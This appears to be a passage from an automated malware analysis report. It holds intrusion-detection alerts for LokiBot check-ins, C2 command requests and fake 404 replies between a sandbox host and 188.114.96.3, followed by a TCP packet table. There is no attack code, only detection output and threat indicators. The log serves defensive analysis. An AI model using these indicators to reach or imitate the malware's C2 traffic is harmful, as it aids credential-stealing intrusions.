2024-09-25T15:30:13.173782+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55978	188.114.96.3	80	TCP
2024-09-25T15:30:13.173782+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55978	188.114.96.3	80	TCP
2024-09-25T15:30:13.839050+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55978	188.114.96.3	80	TCP
2024-09-25T15:30:13.839050+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55978	188.114.96.3	80	TCP
2024-09-25T15:30:13.843863+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55978	TCP
2024-09-25T15:30:13.993423+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55979	188.114.96.3	80	TCP
2024-09-25T15:30:13.993423+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55979	188.114.96.3	80	TCP
2024-09-25T15:30:13.993423+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55979	188.114.96.3	80	TCP
2024-09-25T15:30:14.665373+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55979	188.114.96.3	80	TCP
2024-09-25T15:30:14.665373+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55979	188.114.96.3	80	TCP
2024-09-25T15:30:14.670223+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55979	TCP
2024-09-25T15:30:14.842547+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55980	188.114.96.3	80	TCP
2024-09-25T15:30:14.842547+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55980	188.114.96.3	80	TCP
2024-09-25T15:30:14.842547+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55980	188.114.96.3	80	TCP
2024-09-25T15:30:15.525637+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55980	188.114.96.3	80	TCP
2024-09-25T15:30:15.525637+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55980	188.114.96.3	80	TCP
2024-09-25T15:30:15.531017+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55980	TCP
2024-09-25T15:30:15.691270+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55981	188.114.96.3	80	TCP
2024-09-25T15:30:15.691270+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55981	188.114.96.3	80	TCP
2024-09-25T15:30:15.691270+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55981	188.114.96.3	80	TCP
2024-09-25T15:30:16.351549+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55981	188.114.96.3	80	TCP
2024-09-25T15:30:16.351549+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55981	188.114.96.3	80	TCP
2024-09-25T15:30:16.357320+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55981	TCP
2024-09-25T15:30:16.551798+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55982	188.114.96.3	80	TCP
2024-09-25T15:30:16.551798+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55982	188.114.96.3	80	TCP
2024-09-25T15:30:16.551798+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55982	188.114.96.3	80	TCP
2024-09-25T15:30:17.330144+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55982	188.114.96.3	80	TCP
2024-09-25T15:30:17.330144+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55982	188.114.96.3	80	TCP
2024-09-25T15:30:17.335069+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55982	TCP
2024-09-25T15:30:17.497860+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55983	188.114.96.3	80	TCP
2024-09-25T15:30:17.497860+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55983	188.114.96.3	80	TCP
2024-09-25T15:30:17.497860+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55983	188.114.96.3	80	TCP
2024-09-25T15:30:18.191485+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55983	188.114.96.3	80	TCP
2024-09-25T15:30:18.191485+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55983	188.114.96.3	80	TCP
2024-09-25T15:30:18.196346+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55983	TCP
2024-09-25T15:30:18.363198+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55984	188.114.96.3	80	TCP
2024-09-25T15:30:18.363198+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55984	188.114.96.3	80	TCP
2024-09-25T15:30:18.363198+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55984	188.114.96.3	80	TCP
2024-09-25T15:30:19.039902+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55984	188.114.96.3	80	TCP
2024-09-25T15:30:19.039902+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55984	188.114.96.3	80	TCP
2024-09-25T15:30:19.044870+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55984	TCP
2024-09-25T15:30:19.199856+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55985	188.114.96.3	80	TCP
2024-09-25T15:30:19.199856+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55985	188.114.96.3	80	TCP
2024-09-25T15:30:19.199856+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55985	188.114.96.3	80	TCP
2024-09-25T15:30:19.925798+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55985	188.114.96.3	80	TCP
2024-09-25T15:30:19.925798+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55985	188.114.96.3	80	TCP
2024-09-25T15:30:19.932506+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55985	TCP
2024-09-25T15:30:20.095708+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55986	188.114.96.3	80	TCP
2024-09-25T15:30:20.095708+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55986	188.114.96.3	80	TCP
2024-09-25T15:30:20.095708+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55986	188.114.96.3	80	TCP
2024-09-25T15:30:21.355002+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55986	188.114.96.3	80	TCP
2024-09-25T15:30:21.355002+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55986	188.114.96.3	80	TCP
2024-09-25T15:30:21.361415+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55986	TCP
2024-09-25T15:30:21.507011+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55987	188.114.96.3	80	TCP
2024-09-25T15:30:21.507011+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55987	188.114.96.3	80	TCP
2024-09-25T15:30:21.507011+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55987	188.114.96.3	80	TCP
2024-09-25T15:30:22.975845+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55987	188.114.96.3	80	TCP
2024-09-25T15:30:22.975845+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55987	188.114.96.3	80	TCP
2024-09-25T15:30:22.977810+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55987	TCP
2024-09-25T15:30:23.134473+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55988	188.114.96.3	80	TCP
2024-09-25T15:30:23.134473+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55988	188.114.96.3	80	TCP
2024-09-25T15:30:23.134473+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55988	188.114.96.3	80	TCP
2024-09-25T15:30:24.171451+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55988	188.114.96.3	80	TCP
2024-09-25T15:30:24.171451+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55988	188.114.96.3	80	TCP
2024-09-25T15:30:24.173330+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55988	TCP
2024-09-25T15:30:24.350366+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55989	188.114.96.3	80	TCP
2024-09-25T15:30:24.350366+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55989	188.114.96.3	80	TCP
2024-09-25T15:30:24.350366+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55989	188.114.96.3	80	TCP
2024-09-25T15:30:25.134380+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55989	188.114.96.3	80	TCP
2024-09-25T15:30:25.134380+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55989	188.114.96.3	80	TCP
2024-09-25T15:30:25.139379+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55989	TCP
2024-09-25T15:30:25.290428+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55990	188.114.96.3	80	TCP
2024-09-25T15:30:25.290428+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55990	188.114.96.3	80	TCP
2024-09-25T15:30:25.290428+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55990	188.114.96.3	80	TCP
2024-09-25T15:30:26.009752+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55990	188.114.96.3	80	TCP
2024-09-25T15:30:26.009752+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55990	188.114.96.3	80	TCP
2024-09-25T15:30:26.014599+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55990	TCP
2024-09-25T15:30:26.169979+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55991	188.114.96.3	80	TCP
2024-09-25T15:30:26.169979+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55991	188.114.96.3	80	TCP
2024-09-25T15:30:26.169979+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55991	188.114.96.3	80	TCP
2024-09-25T15:30:26.831403+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55991	188.114.96.3	80	TCP
2024-09-25T15:30:26.831403+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55991	188.114.96.3	80	TCP
2024-09-25T15:30:26.836287+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55991	TCP
2024-09-25T15:30:27.001129+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55992	188.114.96.3	80	TCP
2024-09-25T15:30:27.001129+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55992	188.114.96.3	80	TCP
2024-09-25T15:30:27.001129+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55992	188.114.96.3	80	TCP
2024-09-25T15:30:27.738071+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55992	188.114.96.3	80	TCP
2024-09-25T15:30:27.738071+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55992	188.114.96.3	80	TCP
2024-09-25T15:30:27.742915+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55992	TCP
2024-09-25T15:30:27.899264+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55993	188.114.96.3	80	TCP
2024-09-25T15:30:27.899264+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55993	188.114.96.3	80	TCP
2024-09-25T15:30:27.899264+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55993	188.114.96.3	80	TCP
2024-09-25T15:30:28.608409+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55993	188.114.96.3	80	TCP
2024-09-25T15:30:28.608409+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55993	188.114.96.3	80	TCP
2024-09-25T15:30:28.613288+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55993	TCP
2024-09-25T15:30:28.753857+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55994	188.114.96.3	80	TCP
2024-09-25T15:30:28.753857+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55994	188.114.96.3	80	TCP
2024-09-25T15:30:28.753857+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55994	188.114.96.3	80	TCP
2024-09-25T15:30:29.440258+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55994	188.114.96.3	80	TCP
2024-09-25T15:30:29.440258+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55994	188.114.96.3	80	TCP
2024-09-25T15:30:29.447188+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55994	TCP
2024-09-25T15:30:29.618078+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55995	188.114.96.3	80	TCP
2024-09-25T15:30:29.618078+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55995	188.114.96.3	80	TCP
2024-09-25T15:30:29.618078+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55995	188.114.96.3	80	TCP
2024-09-25T15:30:30.271298+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55995	188.114.96.3	80	TCP
2024-09-25T15:30:30.271298+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55995	188.114.96.3	80	TCP
2024-09-25T15:30:30.276618+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55995	TCP
2024-09-25T15:30:30.428677+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55996	188.114.96.3	80	TCP
2024-09-25T15:30:30.428677+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55996	188.114.96.3	80	TCP
2024-09-25T15:30:30.428677+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55996	188.114.96.3	80	TCP
2024-09-25T15:30:31.121473+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55996	188.114.96.3	80	TCP
2024-09-25T15:30:31.121473+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55996	188.114.96.3	80	TCP
2024-09-25T15:30:31.126338+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55996	TCP
2024-09-25T15:30:31.273028+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55997	188.114.96.3	80	TCP
2024-09-25T15:30:31.273028+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55997	188.114.96.3	80	TCP
2024-09-25T15:30:31.273028+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55997	188.114.96.3	80	TCP
2024-09-25T15:30:31.982949+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55997	188.114.96.3	80	TCP
2024-09-25T15:30:31.982949+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55997	188.114.96.3	80	TCP
2024-09-25T15:30:31.987764+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55997	TCP
2024-09-25T15:30:32.135559+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55998	188.114.96.3	80	TCP
2024-09-25T15:30:32.135559+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55998	188.114.96.3	80	TCP
2024-09-25T15:30:32.135559+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55998	188.114.96.3	80	TCP
2024-09-25T15:30:32.891448+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55998	188.114.96.3	80	TCP
2024-09-25T15:30:32.891448+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55998	188.114.96.3	80	TCP
2024-09-25T15:30:32.896266+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55998	TCP
2024-09-25T15:30:33.256022+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55999	188.114.96.3	80	TCP
2024-09-25T15:30:33.256022+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55999	188.114.96.3	80	TCP
2024-09-25T15:30:33.256022+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55999	188.114.96.3	80	TCP
2024-09-25T15:30:33.917047+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55999	188.114.96.3	80	TCP
2024-09-25T15:30:33.917047+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55999	188.114.96.3	80	TCP
2024-09-25T15:30:33.921906+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55999	TCP
2024-09-25T15:30:34.073488+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56000	188.114.96.3	80	TCP
2024-09-25T15:30:34.073488+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56000	188.114.96.3	80	TCP
2024-09-25T15:30:34.073488+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56000	188.114.96.3	80	TCP
2024-09-25T15:30:35.635959+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	56000	188.114.96.3	80	TCP
2024-09-25T15:30:35.635959+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	56000	188.114.96.3	80	TCP
2024-09-25T15:30:35.638685+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	56000	TCP
2024-09-25T15:30:35.801198+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56001	188.114.96.3	80	TCP
2024-09-25T15:30:35.801198+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56001	188.114.96.3	80	TCP
2024-09-25T15:30:35.801198+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56001	188.114.96.3	80	TCP
2024-09-25T15:30:36.512575+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	56001	188.114.96.3	80	TCP
2024-09-25T15:30:36.512575+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	56001	188.114.96.3	80	TCP
2024-09-25T15:30:36.517408+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	56001	TCP
2024-09-25T15:30:37.771542+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56002	188.114.96.3	80	TCP
2024-09-25T15:30:37.771542+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56002	188.114.96.3	80	TCP
2024-09-25T15:30:37.771542+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56002	188.114.96.3	80	TCP
2024-09-25T15:30:38.532750+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	56002	188.114.96.3	80	TCP
2024-09-25T15:30:38.532750+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	56002	188.114.96.3	80	TCP
2024-09-25T15:30:38.539438+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	56002	TCP
2024-09-25T15:30:38.713862+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56003	188.114.96.3	80	TCP
2024-09-25T15:30:38.713862+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56003	188.114.96.3	80	TCP
2024-09-25T15:30:38.713862+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56003	188.114.96.3	80	TCP
2024-09-25T15:30:39.444328+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	56003	188.114.96.3	80	TCP
2024-09-25T15:30:39.444328+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	56003	188.114.96.3	80	TCP
2024-09-25T15:30:39.450411+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	56003	TCP
2024-09-25T15:30:39.594556+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56004	188.114.96.3	80	TCP
2024-09-25T15:30:39.594556+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56004	188.114.96.3	80	TCP
2024-09-25T15:30:39.594556+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56004	188.114.96.3	80	TCP
2024-09-25T15:30:40.283415+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	56004	188.114.96.3	80	TCP
2024-09-25T15:30:40.283415+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	56004	188.114.96.3	80	TCP
2024-09-25T15:30:40.288333+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	56004	TCP
2024-09-25T15:30:40.433961+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56005	188.114.96.3	80	TCP
2024-09-25T15:30:40.433961+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56005	188.114.96.3	80	TCP
2024-09-25T15:30:40.433961+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56005	188.114.96.3	80	TCP
2024-09-25T15:30:41.170973+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	56005	188.114.96.3	80	TCP
2024-09-25T15:30:41.170973+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	56005	188.114.96.3	80	TCP
2024-09-25T15:30:41.175888+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	56005	TCP
2024-09-25T15:30:41.413983+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56006	188.114.96.3	80	TCP
2024-09-25T15:30:41.413983+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56006	188.114.96.3	80	TCP
2024-09-25T15:30:41.413983+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56006	188.114.96.3	80	TCP
2024-09-25T15:30:42.064291+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	56006	188.114.96.3	80	TCP
2024-09-25T15:30:42.064291+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	56006	188.114.96.3	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 15:28:36.795984983 CEST	49730	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:36.801367044 CEST	80	49730	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:36.801580906 CEST	49730	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:36.803759098 CEST	49730	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:36.808682919 CEST	80	49730	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:36.808752060 CEST	49730	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:36.813646078 CEST	80	49730	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:37.469983101 CEST	80	49730	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:37.472171068 CEST	80	49730	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:37.472265959 CEST	49730	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:37.472985983 CEST	49730	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:37.477950096 CEST	80	49730	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:37.774975061 CEST	49731	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:37.779892921 CEST	80	49731	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:37.779988050 CEST	49731	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:37.782362938 CEST	49731	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:37.787173033 CEST	80	49731	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:37.787247896 CEST	49731	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:37.792136908 CEST	80	49731	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:38.475661993 CEST	80	49731	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:38.475893021 CEST	49731	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:38.475908995 CEST	80	49731	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:38.475960016 CEST	49731	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:38.480813026 CEST	80	49731	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:38.537806988 CEST	49732	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:38.542804003 CEST	80	49732	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:38.542886972 CEST	49732	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:38.544929028 CEST	49732	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:38.549771070 CEST	80	49732	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:38.549981117 CEST	49732	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:38.554918051 CEST	80	49732	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:39.240874052 CEST	80	49732	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:39.241107941 CEST	49732	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:39.241555929 CEST	80	49732	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:39.241648912 CEST	49732	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:39.246004105 CEST	80	49732	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:39.410409927 CEST	49733	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:39.415328979 CEST	80	49733	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:39.415407896 CEST	49733	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:39.417495012 CEST	49733	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:39.422280073 CEST	80	49733	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:39.422339916 CEST	49733	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:39.427262068 CEST	80	49733	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:40.175534010 CEST	80	49733	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:40.175553083 CEST	80	49733	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:40.175614119 CEST	49733	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:40.175663948 CEST	49733	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:40.181087971 CEST	80	49733	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:40.322012901 CEST	49734	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:40.327088118 CEST	80	49734	188.114.96.3	192.168.2.4
